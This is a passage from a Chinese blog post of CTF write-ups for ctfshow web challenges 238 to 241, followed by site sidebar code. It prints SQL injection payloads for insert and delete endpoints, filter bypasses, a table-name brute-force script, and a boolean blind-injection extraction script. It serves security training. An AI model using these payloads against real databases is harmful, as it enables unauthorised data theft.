<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=gylq&amp;username=gylqtest',(<span class="keyword">select</span>(<span class="keyword">group_concat</span>(<span class="string">`column_name`</span>))<span class="keyword">from</span>(information_schema.columns)<span class="keyword">where</span><span class="string">`table_schema`</span>=<span class="keyword">database</span>()<span class="keyword">and</span><span class="string">`table_name`</span>=<span class="string">'flagb'</span>))<span class="comment">#</span></span><br></pre></td></tr></table></figure></div>

<p>查flag</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=gylq&amp;username=gylqtest',(<span class="keyword">select</span>(flag)<span class="keyword">from</span>(flagb)))<span class="comment">#</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web239"><a href="#web239" class="headerlink" title="web239"></a>web239</h2><blockquote>
<ul>
<li>过滤了information，空格</li>
</ul>
</blockquote>
<p>查表</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password&#x3D;gylq&amp;username&#x3D;gylqtest&#39;,(select(group_concat(table_name))from(mysql.innodb_table_stats)))#</span><br></pre></td></tr></table></figure></div>

<p>拼不出来flag，无列名我无能为力</p>
<p><strong>查flag，猜弱flag名称</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username&#x3D;1&#39;,(select&#96;flag&#96;from&#96;flagbb&#96;));#&amp;password&#x3D;1</span><br></pre></td></tr></table></figure></div>

<h2 id="web240"><a href="#web240" class="headerlink" title="web240"></a>web240</h2><blockquote>
<ul>
<li>这题明显是让我们写个爆破py，安排啊</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hint: 表名共9位，flag开头，后五位由a&#x2F;b组成，如flagabaab，全小写</span><br></pre></td></tr></table></figure></div>

<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/8/1</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url="http://108f39e9-3737-4b40-9285-4441a3360741.challenge.ctf.show:<span class="number">8080</span>/api/insert.php<span class="string">"</span></span><br><span class="line"><span class="string">flag="</span>flag<span class="string">"</span></span><br><span class="line"><span class="string">str="</span>ab<span class="string">"</span></span><br><span class="line"><span class="string">payload="</span>gylq<span class="string">',(select(group_concat(flag))from(&#123;&#125;)))#"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">for a in str:</span></span><br><span class="line"><span class="string">    for b in str:</span></span><br><span class="line"><span class="string">        for c in str:</span></span><br><span class="line"><span class="string">            for d in str:</span></span><br><span class="line"><span class="string">                for e in str:</span></span><br><span class="line"><span class="string">                    random=flag+a+b+c+d+e</span></span><br><span class="line"><span class="string">                    data = &#123;</span></span><br><span class="line"><span class="string">                        '</span>username<span class="string">' : payload.format(random) ,</span></span><br><span class="line"><span class="string">                        '</span><span class="keyword">password</span><span class="string">' : "flag"</span></span><br><span class="line"><span class="string">                    &#125;</span></span><br><span class="line"><span class="string">                    res = requests.post(url,data)</span></span><br></pre></td></tr></table></figure></div>

<p>跑一下就可以看到结果</p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801210838287.png" alt="image-20210801210838287"></p>
<h2 id="web241"><a href="#web241" class="headerlink" title="web241"></a>web241</h2><blockquote>
<ul>
<li>一开始想快速了解直接写了个布尔盲注，想着有21条数据，直接写了个布尔盲注的代码，结果只能查出flag前几位，由于环境无法插入，所以只能查出表和字段，但是flag拿不全。</li>
</ul>
</blockquote>
<p>这是可以查表和字段的布尔盲注，不过可利用价值不高，只能查出flag一部分，可以学习，<code>注意：这个代码无法查出结果</code></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"># -- coding:UTF-8 --</span><br><span class="line"># Author:孤桜懶契</span><br><span class="line"># Date:2021&#x2F;8&#x2F;1</span><br><span class="line"># blog: gylq.gitee.io</span><br><span class="line">import requests</span><br><span class="line">#import time</span><br><span class="line"></span><br><span class="line"># def generateNum(num):</span><br><span class="line">#     res &#x3D; &#39;true&#39;</span><br><span class="line">#     if num &#x3D;&#x3D; 1:</span><br><span class="line">#         return res</span><br><span class="line">#     else:</span><br><span class="line">#         for i in range(num-1):</span><br><span class="line">#             res +&#x3D; &quot;+true&quot;</span><br><span class="line">#         return res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url &#x3D; &quot;http:&#x2F;&#x2F;6786d08e-8031-4544-aa67-f4b3028d2c8d.challenge.ctf.show:8080&#x2F;api&#x2F;delete.php&quot;</span><br><span class="line">str &#x3D; &quot;01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，&quot;</span><br><span class="line">flag &#x3D; &quot;&quot;</span><br><span class="line"></span><br><span class="line">#*************************************************************************************************************************************************************</span><br><span class="line">#--------查表</span><br><span class="line">#sql&#x3D; &quot;select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()&quot;</span><br><span class="line">#--------查字段</span><br><span class="line">#sql&#x3D; &quot;select group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;&#39;ctfshow_flagas&#39;&quot;</span><br><span class="line">#--------查flag</span><br><span class="line">#sql&#x3D; &quot;select flagasabc from ctfshow_flagas&quot;</span><br><span class="line">#*************************************************************************************************************************************************************</span><br><span class="line">payload &#x3D; &quot;&#123;&#125; and  if(substr((select group_concat(flag) from flag),&#123;&#125;,1)&#x3D;&#39;&#123;&#125;&#39;,1,0)&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#计数</span><br><span class="line">n &#x3D; 0</span><br><span class="line"></span><br><span class="line">for i in range(20, 44):</span><br><span class="line">    k&#x3D;i-19</span><br><span class="line">    for j in str:</span><br><span class="line">        params &#x3D; &#123;</span><br><span class="line">            &#39;id&#39; : payload.format(k,i,j)</span><br><span class="line">        &#125;</span><br><span class="line">        res &#x3D; requests.post(url &#x3D; url, data &#x3D; params)</span><br><span class="line">        if r&quot;\u5220\u9664\u6210\u529f&quot; in res.text:</span><br><span class="line">            flag +&#x3D; j</span><br><span class="line">            n +&#x3D; 1</span><br><span class="line">            print(&#39;[*] 开始盲注第&#123;&#125;位&#39;.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            if j &#x3D;&#x3D; &quot;&#125;&quot;:</span><br><span class="line">                print(&#39;[*] flag is &#123;&#125;&#39;.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            break</span><br></pre></td></tr></table></figure></div>

<p>实际去环境试了下</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">delete from users where id&#x3D;sleep(0.20)</span><br><span class="line">这样是可以达到延时</span><br></pre></td></tr></table></figure></div>

<p>所以这题应该是时间盲注。好了直接上脚本</p>


        

      
    </div>

      <!-- 相关文章推荐 -->
     
          


     

    
    
    

    <div>
          
            
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/2021/07/13/%E3%80%90ctfshow%E3%80%91web%E7%AF%87wp%E8%AE%B0%E5%BD%95%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/">【ctfshow】web篇wp记录（持续更新）</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 孤桜懶契 的个人博客">孤桜懶契</a></p>
  <p><span>发布时间:</span>2021年07月13日 - 08:18:08</p>
  <p><span>最后更新:</span>2021年08月02日 - 06:15:08</p>
  <p><span>原始链接:</span><a href="/2021/07/13/%E3%80%90ctfshow%E3%80%91web%E7%AF%87wp%E8%AE%B0%E5%BD%95%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/" title="【ctfshow】web篇wp记录（持续更新）">https://gylq.gitee.io/2021/07/13/%E3%80%90ctfshow%E3%80%91web%E7%AF%87wp%E8%AE%B0%E5%BD%95%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://gylq.gitee.io/2021/07/13/%E3%80%90ctfshow%E3%80%91web%E7%AF%87wp%E8%AE%B0%E5%BD%95%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>
</div>
<script>
    var clipboard = new Clipboard('.fa-clipboard');
    $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({
          title: "",
          text: '复制成功',
          icon: "success",
          showConfirmButton: true
          });
    });
    });
</script>


          
    </div>

    

    <div>
      
        <div>
    
        <div class="read-over">-------------------本文结束 <i class="fa fa-paw"></i> 感谢您的阅读-------------------</div>
    
</div>

      
    </div>

    
      <div>
        <div class="share_reward">
  <div>坚持原创技术分享，感谢您的支持和鼓励！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="孤桜懶契 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="孤桜懶契 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" rel="tag"> <i class="fa fa-tag"></i> 学习记录</a>
          
            <a href="/tags/ctf/" rel="tag"> <i class="fa fa-tag"></i> ctf</a>
          
            <a href="/tags/web/" rel="tag"> <i class="fa fa-tag"></i> web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/07/18/%E3%80%90PHP%E3%80%91%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E6%95%B4%E7%90%86/" rel="prev" title="【PHP】基础知识整理">
                <i class="fa fa-chevron-left"></i> 【PHP】基础知识整理
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/07/13/%E3%80%90HTML%E3%80%91%E5%AE%9E%E6%88%98%E9%98%BF%E9%87%8C%E4%BA%91src%E9%A1%B5%E9%9D%A2css%E6%A8%A1%E4%BB%BF%E5%9F%BA%E7%A1%80%E5%AD%A6%E4%B9%A0/" rel="next" title="【HTML】实战阿里云src页面css模仿基础学习">
                【HTML】实战阿里云src页面css模仿基础学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
         <div
  data-weibo-title="分享到微博"
  data-qq-title="分享到QQ"
  data-douban-title="分享到豆瓣"
  class="social-share"
  class="share-component"



  data-disabled="qzone,google+,linkedin"
  data-description="Share.js - 一键分享到微博，QQ空间，腾讯微博，人人，豆瓣...">
   分享到：
</div>


      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  





        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <a href="/">
              <img class="site-author-image" itemprop="image"
                src="/images/qq.png"
                alt="孤桜懶契" />
              </a>
            
              <p class="site-author-name" itemprop="name">孤桜懶契</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">92</span>
                  <span class="site-state-item-name">文章</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">65</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
              <!-- 为Hexo Next主题添加哈林摇特效  -->
              <a title="收藏到书签，偶尔High一下^_^" rel="alternate" class="mw-harlem_shake_slow wobble shake" href="javascript:void(0)" onclick="javascript:(function go() {function c() {var e = document.createElement('link');e.setAttribute('type', 'text/css');e.setAttribute('rel', 'stylesheet');e.setAttribute('href', f);e.setAttribute('class', l);document.body.appendChild(e)}function h(){var e = document.getElementsByClassName(l);for(var t = 0; t< e.length; t++){document.body.removeChild(e[t])}}function p(){var e = document.createElement('div');e.setAttribute('class', a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s = d(i);return s.height>e &amp;&amp;s.height<n &amp;&amp; s.width>t &amp;&amp;s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e &amp;&amp; !isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.scrollTop,document.body.scrollTop)}function E(e){var t=m(e);return t>=w &amp;&amp; t<=b+w}var songs=['https://www.liaofuzhan.com/music/无尽光芒.mp3'];function S(){var e=document.getElementById('audio_element_id');if(e!=null){var index=parseInt(e.getAttribute('curSongIndex'));if(index>songs.length-2){index=0;}else{index++;}e.setAttribute('curSongIndex',index);N();}e.src=i;e.play()}function x(e){e.className+=' '+s+' '+o}function T(e){e.className+=' '+s+' '+u[Math.floor(Math.random()*u.length)]}function N(){var e=document.getElementsByClassName(s);var t=new RegExp('\\b'+s+'\\b');for(var n=0;n<e.length;){e[n].className=e[n].className.replace(t,'')}}function initAudioEle(){var e=document.getElementById('audio_element_id');if(e===null){e=document.createElement('audio');e.setAttribute('class',l);e.setAttribute('curSongIndex',0);e.id='audio_element_id';e.loop=false;e.bgcolor=0;e.addEventListener('canplay',function(){setTimeout(function(){x(k)},500);setTimeout(function(){N();p();for(var e=0;e<O.length;e++){T(O[e])}},15500)},true);e.addEventListener('ended',function(){N();h();go();},true);e.innerHTML='<p>If you are reading this,it is because your browser does not support the audio element. We recommend that you get a new browser.</p><p>';document.body.appendChild(e);}}initAudioEle();var e=30;var t=30;var n=350;var r=350;var curSongIndex=parseInt(document.getElementById('audio_element_id').getAttribute('curSongIndex'));var i=songs[curSongIndex];var s='mw-harlem_shake_me';var o='im_first';var u=['im_drunk','im_baked','im_trippin','im_blown'];var a='mw-strobe_light';var f='https://s3.amazonaws.com/moovweb-marketing/playground/harlem-shake-style.css';var l='mw_added_css';var b=g();var w=y();var C=document.getElementsByTagName('*');var k=null;for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){if(E(A)){k=A;break}}}if(A===null){console.warn('Could not find a node of the right size. Please try a different page.');return}c();S();var O=[];for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){O.push(A)}}})()"><i class="fa fa-music"></i> High~</a>

            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a rel="external nofollow" href="https://github.com/GYLQ/GYLQ.github.io" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i></a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a rel="external nofollow" href="mailto:2324298829@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i></a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a rel="external nofollow" href="https://t.me/GuYingLanQi" target="_blank" title="telegram">
                      
                        <i class="fa fa-fw fa-telegram"></i></a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a rel="external nofollow" href="https://mobile.twitter.com/9mGGrn8tDvq6ZhY" target="_blank" title="twitter">
                      
                        <i class="fa fa-fw fa-twitter"></i></a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a rel="external nofollow" href="https://space.bilibili.com/13563835" target="_blank" title="哔哩哔哩">
                      
                        <i class="fa fa-fw fa-apple"></i></a>
                  </span>
                
            </div>
          

            <!--
            <div id="music163player">
                <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1336790004&auto=1&height=66"></iframe>
            </div>
            -->

          
          

          
          

          <!--近期文章版块 began-->
          
              <div class="links-of-blogroll motion-element links-of-blogroll-block">
                <div class="links-of-blogroll-title">
                  <i class="fa fa-history fa-" aria-hidden="true"></i>
                  近期文章
                </div>
                <ul class="links-of-blogroll-list">
                  
                  
                    <li class='my-links-of-blogroll-li'>
                      <a href="/2021/07/25/%E3%80%90%E5%B0%81%E7%A5%9E%E5%8F%B0%E3%80%91%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B3%A8%E5%85%A5%20wp/" title="【封神台】数据库注入 wp" target="_blank">【封神台】数据库注入 wp</a>
                    </li>
                  
                    <li class='my-links-of-blogroll-li'>
                      <a href="/2021/07/25/%E3%80%90%E5%B0%81%E7%A5%9E%E5%8F%B0%E3%80%91Sql-Labs%20wp/" title="【封神台】Sql-Labs wp" target="_blank">【封神台】Sql-Labs wp</a>
                    </li>
                  
                    <li class='my-links-of-blogroll-li'>
                      <a href="/2021/07/21/%E3%80%90%E5%B0%81%E7%A5%9E%E5%8F%B0%E3%80%91Upload-Labs%20wp/" title="【封神台】Upload-Labs wp" target="_blank">【封神台】Upload-Labs wp</a>
                    </li>
                  
                    <li class='my-links-of-blogroll-li'>
                      <a href="/2021/07/19/%E3%80%90%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E3%80%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E5%A4%87%E5%BF%98%E5%8D%95/" title="【渗透测试】信息收集-备忘单" target="_blank">【渗透测试】信息收集-备忘单</a>
                    </li>
                  
                    <li class='my-links-of-blogroll-li'>
                      <a href="/2021/07/19/%E3%80%90GITHUB%E3%80%91Github%E4%B8%8A%E4%BC%A0%E6%9C%AC%E5%9C%B0%E9%A1%B9%E7%9B%AE/" title="【GITHUB】Github上传本地项目" target="_blank">【GITHUB】Github上传本地项目</a>
                    </li>
                  
                </ul>
              </div>
          
          <!--近期文章版块 end-->

          
              <!-- canvas粒子时钟 -->
              <!-- canvas粒子时钟 https://www.cnblogs.com/xiaohuochai/p/6368039.html
  https://www.html5tricks.com/html5-canvas-dance-time.html
 -->
<div id="">
  <canvas id="canvas" style="width:60%;">
</div>
<script async>
(function(){
  var WINDOW_WIDTH = 820;
  		var WINDOW_HEIGHT = 250;
  		var RADIUS = 7; //球半径
  		var NUMBER_GAP = 10; //数字之间的间隙
  		var u=0.65; //碰撞能量损耗系数
  		var context; //Canvas绘制上下文
  		var balls = []; //存储彩色的小球
  		const colors = ["#33B5E5","#0099CC","#AA66CC","#9933CC","#99CC00","#669900","#FFBB33","#FF8800","#FF4444","#CC0000"]; //彩色小球的颜色
  		var currentNums = []; //屏幕显示的8个字符
  		var digit =
                  [
                      [
                          [0,0,1,1,1,0,0],
                          [0,1,1,0,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,0,1,1,0],
                          [0,0,1,1,1,0,0]
                      ],//0
                      [
                          [0,0,0,1,1,0,0],
                          [0,1,1,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [1,1,1,1,1,1,1]
                      ],//1
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,0,0,0],
                          [0,1,1,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,0,0,0,1,1],
                          [1,1,1,1,1,1,1]
                      ],//2
                      [
                          [1,1,1,1,1,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,1,0,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//3
                      [
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,1,0],
                          [0,0,1,1,1,1,0],
                          [0,1,1,0,1,1,0],
                          [1,1,0,0,1,1,0],
                          [1,1,1,1,1,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,1,1]
                      ],//4
                      [
                          [1,1,1,1,1,1,1],
                          [1,1,0,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,1,1,1,1,0],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//5
                      [
                          [0,0,0,0,1,1,0],
                          [0,0,1,1,0,0,0],
                          [0,1,1,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,0,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//6
                      [
                          [1,1,1,1,1,1,1],
                          [1,1,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0]
                      ],//7
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//8
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,1,1,0,0,0,0]
                      ],//9
                      [
                          [0,0,0,0],
                          [0,0,0,0],
                          [0,1,1,0],
                          [0,1,1,0],
                          [0,0,0,0],
                          [0,0,0,0],
                          [0,1,1,0],
                          [0,1,1,0],
                          [0,0,0,0],
                          [0,0,0,0]
                      ]//:
                  ];

  		function drawDatetime(cxt){
  			var nums = [];

  			context.fillStyle="#005eac"
  			var date = new Date();
  			var offsetX = 70, offsetY = 30;
  			var hours = date.getHours();
  			var num1 = Math.floor(hours/10);
  			var num2 = hours%10;
  			nums.push({num: num1});
  			nums.push({num: num2});
  			nums.push({num: 10}); //冒号
  			var minutes = date.getMinutes();
  			var num1 = Math.floor(minutes/10);
  			var num2 = minutes%10;
  			nums.push({num: num1});
  			nums.push({num: num2});
  			nums.push({num: 10}); //冒号
  			var seconds = date.getSeconds();
  			var num1 = Math.floor(seconds/10);
  			var num2 = seconds%10;
  			nums.push({num: num1});
  			nums.push({num: num2});

  			for(var x = 0;x<nums.length;x++){
  				nums[x].offsetX = offsetX;
  				offsetX = drawSingleNumber(offsetX,offsetY, nums[x].num,cxt);
  				//两个数字连一块，应该间隔一些距离
  				if(x<nums.length-1){
  					if((nums[x].num!=10) &&(nums[x+1].num!=10)){
  						offsetX+=NUMBER_GAP;
  					}
  				}
  			}

  			//说明这是初始化
  			if(currentNums.length ==0){
  				currentNums = nums;
  			}else{
  				//进行比较
  				for(var index = 0;index<currentNums.length;index++){
  					if(currentNums[index].num!=nums[index].num){
  						//不一样时，添加彩色小球
  						addBalls(nums[index]);
  						currentNums[index].num=nums[index].num;
  					}
  				}
  			}
  			renderBalls(cxt);
  			updateBalls();

  			return date;
  		}

  		function addBalls (item) {
  			var num = item.num;
  			var numMatrix = digit[num];
  			for(var y = 0;y<numMatrix.length;y++){
  				for(var x = 0;x<numMatrix[y].length;x++){
  					if(numMatrix[y][x]==1){
  						var ball={
  							offsetX:item.offsetX+RADIUS+RADIUS*2*x,
  							offsetY:30+RADIUS+RADIUS*2*y,
  							color:colors[Math.floor(Math.random()*colors.length)],
  							g:1.5+Math.random(),
  							vx:Math.pow(-1, Math.ceil(Math.random()*10))*4+Math.random(),
  							vy:-5
  						}
  						balls.push(ball);
  					}
  				}
  			}
  		}

  		function renderBalls(cxt){
  			for(var index = 0;index<balls.length;index++){
  				cxt.beginPath();
  				cxt.fillStyle=balls[index].color;
